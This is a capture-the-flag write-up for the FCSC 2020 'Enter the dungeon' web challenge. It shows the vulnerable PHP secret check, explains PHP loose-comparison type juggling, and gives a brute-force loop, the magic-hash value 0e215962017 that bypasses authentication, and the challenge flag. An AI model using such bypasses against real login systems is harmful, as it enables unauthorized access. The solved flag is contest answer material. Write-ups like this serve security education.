FCSC 2020 - Enter the dungeon (web)

Web - Enter the dungeon

After looking at the source code we can find the backend source code at : http://challenges2.france-cybersecurity-challenge.fr:5002/check_secret.txt

    $_SESSION['dungeon_master'] = 0;
    <title>Enter The Dungeon</title>
<body style="background-color:#3CB371;">
<center><h1>Enter The Dungeon</h1></center>
    echo '<div style="font-size:85%;color:purple">For security reason, secret check is disable !</div><br />';
    echo '<pre>'.chr(10);
    echo chr(10).'</pre>';

    // authentication is replaced by an impossible test
    //if(md5($_GET['secret']) == "a5de2c87ba651432365a5efd928ee8f2")
    if(md5($_GET['secret']) == $_GET['secret'])
        $_SESSION['dungeon_master'] = 1;
        echo "Secret is correct, welcome Master ! You can now enter the dungeon";
        echo "Wrong secret !";

Following the code we need something as

md5($_GET['secret']) == $_GET['secret']

This should be quite hard to find but not impossible I think. But will take so much time to find a string when md5 hashed give the same string.

However the php comparison operator used is == which is a loose comparison, meaning that it compare types before comparing value, for example.

php > echo "1000" == 1000;                                                                
php > echo "0e123456" == 0;
echo "0e1787" == "0e9880";

Lot of stuff related to this here : https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

So I wanted to find a string like 0eX where is X is whatever digit as long as needed and that the md5 of this string starts with 0e.


  for( $i = 0;; $i++) {
    $test = "0e".$i;
    if( md5($test) == $test) {
      echo $test;


And after few minute it found : 0e215962017 and we can verify it before sending it.

php > echo md5("0e215962017") == "0e215962017";

flag : FCSC{f67aaeb3b15152b216cb1addbf0236c66f9d81c4487c4db813c1de8603bb2b5b}**